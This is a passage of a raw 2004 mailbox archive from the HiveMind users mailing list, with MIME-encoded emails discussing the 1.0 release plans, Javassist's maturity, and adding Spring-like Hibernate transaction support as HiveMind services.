New Roman" } LI.MsoNormal { FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman"; = mso-style-parent: ""; mso-pagination: widow-orphan; = mso-fareast-font-family: "Times New Roman" } DIV.MsoNormal { FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman"; = mso-style-parent: ""; mso-pagination: widow-orphan; = mso-fareast-font-family: "Times New Roman" } A:link { COLOR: blue; TEXT-DECORATION: underline; text-underline: single } SPAN.MsoHyperlink { COLOR: blue; TEXT-DECORATION: underline; text-underline: single } A:visited { COLOR: purple; TEXT-DECORATION: underline; text-underline: single } SPAN.MsoHyperlinkFollowed { COLOR: purple; TEXT-DECORATION: underline; text-underline: single } SPAN.EmailFormatvorlage17 { COLOR: windowtext; FONT-FAMILY: Arial; mso-style-type: = personal-compose; mso-style-noshow: yes; mso-ansi-font-size: 10.0pt; = mso-bidi-font-size: 10.0pt; mso-ascii-font-family: Arial; = mso-hansi-font-family: Arial; mso-bidi-font-family: Arial } DIV.Section1 { page: Section1 } </STYLE> <!--[if gte mso 10]> <style> /* Style Definitions */=20 table.MsoNormalTable {mso-style-name:"Normale Tabelle"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin:0cm; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman";} </style> <![endif]--></HEAD> <BODY lang=3DDE style=3D"tab-interval: 35.4pt" vLink=3Dpurple = link=3Dblue> <DIV><SPAN class=3D183071219-01072004><FONT face=3DArial color=3D#0000ff = size=3D2>I'd=20 rather respond on the HiveMind user mailing list.</FONT></SPAN></DIV> <DIV><SPAN class=3D183071219-01072004><FONT face=3DArial color=3D#0000ff = size=3D2></FONT></SPAN>&nbsp;</DIV> <DIV><SPAN class=3D183071219-01072004><FONT face=3DArial color=3D#0000ff = size=3D2>There=20 is a vote currently to release 1.0 beta-1.</FONT></SPAN></DIV> <DIV><SPAN class=3D183071219-01072004><FONT face=3DArial color=3D#0000ff = size=3D2></FONT></SPAN>&nbsp;</DIV> <DIV><SPAN class=3D183071219-01072004><FONT face=3DArial color=3D#0000ff = size=3D2>The=20 framework is very mature in my opinion; it wasn't slapped together like = some=20 open-source projects. It has some hardcore TDD (test driven development) = going=20 on in there to give me confidence that it all works.&nbsp; = </FONT></SPAN></DIV> <DIV><SPAN class=3D183071219-01072004><FONT face=3DArial color=3D#0000ff = size=3D2></FONT></SPAN>&nbsp;</DIV> <DIV><SPAN class=3D183071219-01072004><FONT face=3DArial color=3D#0000ff = size=3D2>I've=20 had no problems with Javassist with either HiveMind or Tapestry. We're = using=20 just a fraction (perhaps a stable fraction) of what Javassist can do ... = creating new classes at runtime, not modifying classes that are already = in=20 existence.&nbsp; Again, it works because the HiveMind&nbsp;test suite = contains=20 well over 400 tests and most of those create dozens of new classes using = Javassist.</FONT></SPAN></DIV> <DIV>&nbsp;</DIV> <DIV>&nbsp;</DIV><!-- Converted from text/plain format --> <P><FONT size=3D2>--<BR>Howard M. Lewis Ship<BR>Independent J2EE / = Open-Source=20 Java Consultant<BR>Creator, Jakarta Tapestry<BR>Creator, Jakarta = HiveMind<BR><A=20 href=3D"http://howardlewisship.com/">http://howardlewisship.com</A><BR></= FONT></P> <BLOCKQUOTE dir=3Dltr=20 style=3D"PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #0000ff 2px = solid; MARGIN-RIGHT: 0px"> <DIV></DIV> <DIV class=3DOutlookMessageHeader lang=3Den-us dir=3Dltr = align=3Dleft><FONT=20 face=3DTahoma size=3D2>-----Original Message-----<BR><B>From:</B>=20 [email protected] [mailto:[email protected]] = <BR><B>Sent:</B>=20 Thursday, July 01, 2004 2:08 PM<BR><B>To:</B>=20 [email protected]<BR><B>Subject:</B> Time plan for Hivemind = release=20 1.0<BR><BR></FONT></DIV> <DIV class=3DSection1> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN lang=3DEN-GB=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-ansi-language: = EN-GB">Hi=20 Howard,<o:p></o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN lang=3DEN-GB=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-ansi-language: = EN-GB"><o:p>&nbsp;</o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN lang=3DEN-GB=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-ansi-language: = EN-GB">do you=20 have kind of a plan when to release Hivemind 1.0 beta and=20 1.0?<o:p></o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN lang=3DEN-GB=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-ansi-language: = EN-GB"><o:p>&nbsp;</o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN lang=3DEN-GB=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-ansi-language: = EN-GB">I read=20 the Hivemind documentation quite thoroughly and tried it out = practically. I=20 think it is really a helpful framework for our J2EE=20 software.<o:p></o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN lang=3DEN-GB=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-ansi-language: = EN-GB">However=20 I&#8217;m a bit concerned about its immaturity, at least judging by = its early=20 pre-release state.<o:p></o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN lang=3DEN-GB=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-ansi-language: = EN-GB"><o:p>&nbsp;</o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN lang=3DEN-GB=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-ansi-language: = EN-GB">The=20 other thing that worries me a bit is this javassist thing. I = didn&#8217;t have the=20 time to look more closely into it yet. But a colleague of mine warned = that it=20 is quite immature either and that it plays around with byte code in a = way that=20 is a bit unusual.<o:p></o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN lang=3DEN-GB=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-ansi-language: = EN-GB"><o:p>&nbsp;</o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN lang=3DEN-GB=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-ansi-language: = EN-GB">Can you=20 make a clarifying statement on that?<o:p></o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN lang=3DEN-GB=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-ansi-language: = EN-GB"><o:p>&nbsp;</o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN lang=3DEN-GB=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-ansi-language: = EN-GB">Thanks,<o:p></o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN lang=3DEN-GB=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-ansi-language: = EN-GB">Matthias=20 Burbach<o:p></o:p></SPAN></FONT></P> <P class=3DMsoNormal><FONT face=3DArial size=3D2><SPAN lang=3DEN-GB=20 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-ansi-language: = EN-GB"><o:p>&nbsp;</o:p></SPAN></FONT></P></DIV></BLOCKQUOTE></BODY></HTM= L> ------=_NextPart_000_0019_01C45F7E.4C48BD50-- From [email protected] Thu Jul 01 19:30:03 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47113 invoked from network); 1 Jul 2004 19:30:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Jul 2004 19:30:03 -0000 Received: (qmail 78928 invoked by uid 500); 1 Jul 2004 19:30:18 -0000 Delivered-To: [email protected] Received: (qmail 78872 invoked by uid 500); 1 Jul 2004 19:30:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 78846 invoked by uid 99); 1 Jul 2004 19:30:16 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=HTML_80_90,HTML_MESSAGE X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO server.unitdev.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Thu, 01 Jul 2004 12:30:15 -0700 Received: from unit02 (w068.z064002059.sjc-ca.dsl.cnc.net [161.129.204.104]) by server.unitdev.com (8.12.10/8.12.10) with ESMTP id i61KROu7031868 for <[email protected]>; Thu, 1 Jul 2004 13:27:24 -0700 Message-Id: <[email protected]> From: "Drew McAuliffe" <[email protected]> To: <[email protected]> Subject: Spring-like transaction features? Date: Thu, 1 Jul 2004 12:29:55 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0270_01C45F67.1D6A4330" X-Mailer: Microsoft Office Outlook, Build 11.0.5510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409 Thread-Index: AcRfp/i0GmZDfjn+RZW+qTGJHyVX8wABrbeQ In-Reply-To: <001801c45f9f$d35a5d50$6501a8c0@ALMIGHTYBEAST> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N ------=_NextPart_000_0270_01C45F67.1D6A4330 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Are there any plans to introduce features into HiveMind like Spring's abstraction of transactionality of Hibernate or other data access? I like the way that Spring can make the details of data access and transactionality configurable but I prefer the way HiveMind deals with the overall service abstraction, pluggability, interception, etc. Is there any plan to introduce these higher-order features into HiveMind, or is it still concentrating mainly on the IoC/container/pluggability side of things? Or does anyone out there have a HiveMind module that does a similar thing? I'm investigating moving a combination of homegrown app layers to either one of these two big guys, and I don't like the idea of mixing them because of the functionality overlap. Thanks, Drew ------=_NextPart_000_0270_01C45F67.1D6A4330 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML xmlns=3D"http://www.w3.org/TR/REC-html40" xmlns:o =3D=20 "urn:schemas-microsoft-com:office:office" xmlns:w =3D=20 "urn:schemas-microsoft-com:office:word"><HEAD><TITLE>Message</TITLE> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Dus-ascii"> <META content=3DWord.Document name=3DProgId> <META content=3D"MSHTML 6.00.2800.1400" name=3DGENERATOR> <META content=3D"Microsoft Word 10" name=3DOriginator><LINK=20 href=3D"cid:[email protected]" rel=3DFile-List><!--[if gte = mso 9]><xml> <o:OfficeDocumentSettings> <o:DoNotRelyOnCSS/> </o:OfficeDocumentSettings> </xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:GrammarState>Clean</w:GrammarState> <w:DocumentKind>DocumentEmail</w:DocumentKind> <w:HyphenationZone>21</w:HyphenationZone> <w:EnvelopeVis/> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument> </xml><![endif]--> <STYLE>@page Section1 {size: 595.3pt 841.9pt; margin: 70.85pt 70.85pt = 2.0cm 70.85pt; mso-header-margin: 35.4pt; mso-footer-margin: 35.4pt; = mso-paper-source: 0; } P.MsoNormal { FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman"; = mso-style-parent: ""; mso-pagination: widow-orphan; = mso-fareast-font-family: "Times New Roman" } LI.MsoNormal { FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman"; = mso-style-parent: ""; mso-pagination: widow-orphan; = mso-fareast-font-family: "Times New Roman" } DIV.MsoNormal { FONT-SIZE: 12pt; MARGIN: 0cm 0cm 0pt; FONT-FAMILY: "Times New Roman"; = mso-style-parent: ""; mso-pagination: widow-orphan; = mso-fareast-font-family: "Times New Roman" } A:link { COLOR: blue; TEXT-DECORATION: underline; text-underline: single } SPAN.MsoHyperlink { COLOR: blue; TEXT-DECORATION: underline; text-underline: single } A:visited { COLOR: purple; TEXT-DECORATION: underline; text-underline: single } SPAN.MsoHyperlinkFollowed { COLOR: purple; TEXT-DECORATION: underline; text-underline: single } SPAN.EmailFormatvorlage17 { COLOR: windowtext; FONT-FAMILY: Arial; mso-style-type: = personal-compose; mso-style-noshow: yes; mso-ansi-font-size: 10.0pt; = mso-bidi-font-size: 10.0pt; mso-ascii-font-family: Arial; = mso-hansi-font-family: Arial; mso-bidi-font-family: Arial } DIV.Section1 { page: Section1 } </STYLE> <!--[if gte mso 10]> <style> /* Style Definitions */=20 table.MsoNormalTable {mso-style-name:"Normale Tabelle"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin:0cm; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman";} </style> <![endif]--></HEAD> <BODY lang=3DDE style=3D"tab-interval: 35.4pt" vLink=3Dpurple = link=3Dblue> <DIV><SPAN class=3D236072619-01072004><FONT face=3DArial color=3D#0000ff = size=3D2>Are=20 there any plans to introduce features into HiveMind like Spring's = abstraction of=20 transactionality of Hibernate or other data access? I like the way that = Spring=20 can make the details of data access and transactionality configurable = but I=20 prefer the way HiveMind deals with the overall service abstraction,=20 pluggability, interception, etc. Is there any plan to introduce these=20 higher-order features into HiveMind, or is it still concentrating mainly = on the=20 IoC/container/pluggability side of things? Or does anyone out there have = a=20 HiveMind module that does a similar thing? I'm investigating moving a=20 combination of homegrown app layers to either one of these two big guys, = and I=20 don't like the idea of mixing them because of the functionality=20 overlap.</FONT></SPAN></DIV> <DIV><SPAN class=3D236072619-01072004><FONT face=3DArial color=3D#0000ff = size=3D2></FONT></SPAN>&nbsp;</DIV> <DIV><SPAN class=3D236072619-01072004><FONT face=3DArial color=3D#0000ff = size=3D2>Thanks,</FONT></SPAN></DIV> <DIV><SPAN class=3D236072619-01072004><FONT face=3DArial color=3D#0000ff = size=3D2><BR>Drew</FONT></SPAN></DIV></BODY></HTML> ------=_NextPart_000_0270_01C45F67.1D6A4330-- From [email protected] Thu Jul 01 19:39:05 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52475 invoked from network); 1 Jul 2004 19:39:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Jul 2004 19:39:05 -0000 Received: (qmail 99160 invoked by uid 500); 1 Jul 2004 19:39:20 -0000 Delivered-To: [email protected] Received: (qmail 99132 invoked by uid 500); 1 Jul 2004 19:39:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 99114 invoked by uid 99); 1 Jul 2004 19:39:20 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_BY_IP,SB_NEW_BULK,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Thu, 01 Jul 2004 12:39:18 -0700 Received: by mproxy.gmail.com with SMTP id x43so585823cwb for <[email protected]>; Thu, 01 Jul 2004 12:38:57 -0700 (PDT) Received: by 161.129.204.104 with SMTP id v3mr176761cwb; Thu, 01 Jul 2004 12:38:57 -0700 (PDT) Message-ID: <[email protected]> Date: Thu, 1 Jul 2004 15:38:57 -0400 From: Howard Lewis Ship <[email protected]> To: [email protected] Subject: Re: Spring-like transaction features? In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Rod (Johnson) has repeatedly suggest that we leverage their implementation of transactions. I've been short on time pursuing that. I think I would whip together a simple transaction interceptor in a few hours, and probalby not much longer to try and grok the Spring Transaction support and turn that into an interceptor. The overlap doesn't bother me too much and it's certainly a great way to leapfrog functionality in HiveMind, by leveraging what Spring already offers. Rod is interested in the other way, since Spring doesn't have anything sufficiently like configurations. You don't have to zoom in very far to see that HiveMind and Spring are significantly different from each other and, I think , complementary. ----- Original Message ----- From: Drew McAuliffe <[email protected]> Date: Thu, 1 Jul 2004 12:29:55 -0700 Subject: Spring-like transaction features? To: [email protected] Are there any plans to introduce features into HiveMind like Spring's abstraction of transactionality of Hibernate or other data access? I like the way that Spring can make the details of data access and transactionality configurable but I prefer the way HiveMind deals with the overall service abstraction, pluggability, interception, etc. Is there any plan to introduce these higher-order features into HiveMind, or is it still concentrating mainly on the IoC/container/pluggability side of things? Or does anyone out there have a HiveMind module that does a similar thing? I'm investigating moving a combination of homegrown app layers to either one of these two big guys, and I don't like the idea of mixing them because of the functionality overlap. Thanks, Drew -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 01 19:59:03 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 63228 invoked from network); 1 Jul 2004 19:59:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Jul 2004 19:59:03 -0000 Received: (qmail 49109 invoked by uid 500); 1 Jul 2004 19:59:17 -0000 Delivered-To: [email protected] Received: (qmail 48993 invoked by uid 500); 1 Jul 2004 19:59:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48908 invoked by uid 99); 1 Jul 2004 19:59:12 -0000 X-ASF-Spam-Status: No, hits=0.8 required=10.0 tests=DNS_FROM_RFC_ABUSE,HTML_10_20,HTML_MESSAGE,TO_ADDRESS_EQ_REAL X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO www-dgi.afip.gov.ar) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Thu, 01 Jul 2004 12:59:11 -0700 Received: from intranet6.afip.gov.ar (intranet6 [161.129.204.104]) by www-dgi.afip.gov.ar with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2655.55) id NXTFGXJN; Thu, 1 Jul 2004 16:58:46 -0300 Received: from plalloni (161.129.204.104 [161.129.204.104]) by intranet6.afip.gov.ar with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id N7KPCXL1; Thu, 1 Jul 2004 16:58:44 -0300 Subject: Re: Spring-like transaction features? From: Pablo Lalloni <[email protected]> To: "[email protected]" <[email protected]> In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: multipart/alternative; boundary="=-eiY6LfhS+h1YrTYnigMI" Organization: AFIP - DDIT - Proyecto Pampa Message-Id: <1088711377.21821.60.camel@plalloni> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.6 Date: Thu, 01 Jul 2004 16:49:38 -0300 X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N --=-eiY6LfhS+h1YrTYnigMI Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable We've written full support for Hibernate and JDBC as HiveMind services, and I'm currently working on a TransactionInterceptor factory service to use declarative transaction demarcation a-la EJB.=20 To support Hibernate we made an HibernateSessionService who's able to receive contributions of SessionFactory's configurations and also mappings (hbm's) for persistent classes. On startup this service builds up all the SessionFactory's as determined by contributions associating to each the corresponding persistent classes. After this any dependant component can ask for a Session corresponding to a given class or query name. Sessions are associated to threads through ThreadStorageService so the same Session can be returned for the same thread, they're cleaned up con thread cleanup events. Also did something alike for supporting a FastLaneReader through JDBC where we take a similar approach for Connection management. In front of this services we have a FinderService and a CRUDService which can be used for what their names mean despite whether the data is accessed through JDBC, Hibernate or any future data access backend implemented as a HiveMind service. Transactions are handled with the above mentioned interceptor supporting EJB CMT policies. If anyone's interested in any of this, I guess I can send out more details and/or code (if my boss agree with it, of which I'm pretty confident). Cheers, PiL El jue, 01-07-2004 a las 16:29, Drew McAuliffe escribi=F3: > Are there any plans to introduce features into HiveMind like Spring's > abstraction of transactionality of Hibernate or other data access? I > like the way that Spring can make the details of data access and > transactionality configurable but I prefer the way HiveMind deals with > the overall service abstraction, pluggability, interception, etc. Is > there any plan to introduce these higher-order features into HiveMind, > or is it still concentrating mainly on the IoC/container/pluggability > side of things? Or does anyone out there have a HiveMind module that > does a similar thing? I'm investigating moving a combination of > homegrown app layers to either one of these two big guys, and I don't > like the idea of mixing them because of the functionality overlap. > =20 > Thanks, > Drew --=-eiY6LfhS+h1YrTYnigMI Content-Type: text/html; charset=utf-8 Content-Transfer-Encoding: 7bit <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=UTF-8"> <META NAME="GENERATOR" CONTENT="GtkHTML/3.0.10"> <TITLE>Message</TITLE> </HEAD> <BODY LINK="#0000ff"> We've written full support for Hibernate and JDBC as HiveMind services, and I'm currently working on a TransactionInterceptor factory service to use declarative transaction demarcation a-la EJB. <BR> <BR> To support Hibernate we made an HibernateSessionService who's able to receive contributions of SessionFactory's configurations and also mappings (hbm's) for persistent classes. On startup this service builds up all the SessionFactory's as determined by contributions associating to each the corresponding persistent classes. After this any dependant component can ask for a Session corresponding to a given class or query name. Sessions are associated to threads through ThreadStorageService so the same Session can be returned for the same thread, they're cleaned up con thread cleanup events.<BR> <BR> Also did something alike for supporting a FastLaneReader through JDBC where we take a similar approach for Connection management.<BR> <BR> In front of this services we have a FinderService and a CRUDService which can be used for what their names mean despite whether the data is accessed through JDBC, Hibernate or any future data access backend implemented as a HiveMind service.<BR> <BR> Transactions are handled with the above mentioned interceptor supporting EJB CMT policies.<BR> <BR> If anyone's interested in any of this, I guess I can send out more details and/or code (if my boss agree with it, of which I'm pretty confident).<BR> <BR> Cheers,<BR> PiL<BR> <BR> El jue, 01-07-2004 a las 16:29, Drew McAuliffe escribi&#243;: <BLOCKQUOTE TYPE=CITE> <FONT COLOR="#0000ff" SIZE="2"><I>Are there any plans to introduce features into HiveMind like Spring's abstraction of transactionality of Hibernate or other data access? I like the way that Spring can make the details of data access and transactionality configurable but I prefer the way HiveMind deals with the overall service abstraction, pluggability, interception, etc. Is there any plan to introduce these higher-order features into HiveMind, or is it still concentrating mainly on the IoC/container/pluggability side of things? Or does anyone out there have a HiveMind module that does a similar thing? I'm investigating moving a combination of homegrown app layers to either one of these two big guys, and I don't like the idea of mixing them because of the functionality overlap.</FONT><BR> <FONT COLOR="#737373">&nbsp;</FONT><BR> <FONT COLOR="#0000ff" SIZE="2">Thanks,<BR> Drew</I></FONT> </BLOCKQUOTE> </BODY> </HTML> --=-eiY6LfhS+h1YrTYnigMI-- From [email protected] Thu Jul 01 22:05:23 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24081 invoked from network); 1 Jul 2004 22:05:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Jul 2004 22:05:23 -0000 Received: (qmail 9281 invoked by uid 500); 1 Jul 2004 22:05:43 -0000 Delivered-To: [email protected] Received: (qmail 9225 invoked by uid 500); 1 Jul 2004 22:05:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9199 invoked by uid 99); 1 Jul 2004 22:05:41 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=HTML_30_40,HTML_MESSAGE X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO server.unitdev.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Thu, 01 Jul 2004 15:05:40 -0700 Received: from unit02 (w068.z064002059.sjc-ca.dsl.cnc.net [161.129.204.104]) by server.unitdev.com (8.12.10/8.12.10) with ESMTP id i61N2gu7001595 for <[email protected]>; Thu, 1 Jul 2004 16:02:42 -0700 Message-Id: <[email protected]> From: "Drew McAuliffe" <[email protected]> To: <[email protected]> Subject: RE: Spring-like transaction features? Date: Thu, 1 Jul 2004 15:05:13 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_028E_01C45F7C.CFB14060" X-Mailer: Microsoft Office Outlook, Build 11.0.5510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409 Thread-Index: AcRfreDgwnWxfHo5TcqYg1+txmrrzgACS37g In-Reply-To: <1088711377.21821.60.camel@plalloni> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N ------=_NextPart_000_028E_01C45F7C.CFB14060 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I'd be extremely interested in it. One of the things that interests me especially about a HiveMind approach to Hibernate configuration is the = fact that separate modules can each have their own set of hibernate mappings, = and these can be aggregated at the highest level by your application. I've = found it difficult to combine hibernate mappings from separate jars into one session factory configuration without resorting to appserver-specific contortions. If I'm not mistaken, this HiveMind approach of yours allows exactly what I'm looking for. =20 Please let me know if you have more info or need my address. =20 Thanks, =20 Drew _____ =20 From: Pablo Lalloni [mailto:[email protected]]=20 Sent: Thursday, July 01, 2004 12:50 PM To: [email protected] Subject: Re: Spring-like transaction features? We've written full support for Hibernate and JDBC as HiveMind services, = and I'm currently working on a TransactionInterceptor factory service to use declarative transaction demarcation a-la EJB.=20 To support Hibernate we made an HibernateSessionService who's able to receive contributions of SessionFactory's configurations and also = mappings (hbm's) for persistent classes. On startup this service builds up all = the SessionFactory's as determined by contributions associating to each the corresponding persistent classes. After this any dependant component can = ask for a Session corresponding to a given class or query name. Sessions are associated to threads through ThreadStorageService so the same Session = can be returned for the same thread, they're cleaned up con thread cleanup events. Also did something alike for supporting a FastLaneReader through JDBC = where we take a similar approach for Connection management. In front of this services we have a FinderService and a CRUDService = which can be used for what their names mean despite whether the data is = accessed through JDBC, Hibernate or any future data access backend implemented as = a HiveMind service. Transactions are handled with the above mentioned interceptor supporting = EJB CMT policies. If anyone's interested in any of this, I guess I can send out more = details and/or code (if my boss agree with it, of which I'm pretty confident). Cheers, PiL El jue, 01-07-2004 a las 16:29, Drew McAuliffe escribi=F3:=20 Are there any plans to introduce features into HiveMind like Spring's abstraction of transactionality of Hibernate or other data access? I = like the way that Spring can make the details of data access and = transactionality configurable but I prefer the way HiveMind deals with the overall = service abstraction, pluggability, interception, etc. Is there any plan to = introduce these higher-order features into HiveMind, or is it still concentrating mainly on the IoC/container/pluggability side of things? Or does anyone = out there have a HiveMind module that does a similar thing? I'm = investigating moving a combination of homegrown app layers to either one of these two = big guys, and I don't like the idea of mixing them because of the = functionality overlap. =20 Thanks, Drew=20 ------=_NextPart_000_028E_01C45F7C.CFB14060 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>Message</TITLE> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Diso-8859-1"> <META content=3D"MSHTML 6.00.2800.1400" name=3DGENERATOR></HEAD> <BODY link=3D#0000ff> <DIV dir=3Dltr align=3Dleft><SPAN class=3D674100222-01072004><FONT = face=3DArial=20 color=3D#0000ff size=3D2>I'd be extremely interested in it. One of the = things that=20 interests me especially about a HiveMind approach to Hibernate = configuration is=20 the fact that separate modules can each have their own set of hibernate=20 mappings, and these can be aggregated at the highest level by your = application.=20 I've found it difficult to combine hibernate mappings from separate jars = into=20 one session factory configuration without resorting to = appserver-specific=20 contortions. If I'm not mistaken, this HiveMind approach of yours allows = exactly=20 what I'm looking for.</FONT></SPAN></DIV> <DIV dir=3Dltr align=3Dleft><SPAN class=3D674100222-01072004><FONT = face=3DArial=20 color=3D#0000ff size=3D2></FONT></SPAN>&nbsp;</DIV> <DIV dir=3Dltr align=3Dleft><SPAN class=3D674100222-01072004><FONT = face=3DArial=20 color=3D#0000ff size=3D2>Please let me know if you have more info or = need my=20 address.</FONT></SPAN></DIV> <DIV dir=3Dltr align=3Dleft><SPAN class=3D674100222-01072004><FONT = face=3DArial=20 color=3D#0000ff size=3D2></FONT></SPAN>&nbsp;</DIV> <DIV dir=3Dltr align=3Dleft><SPAN class=3D674100222-01072004><FONT = face=3DArial=20 color=3D#0000ff 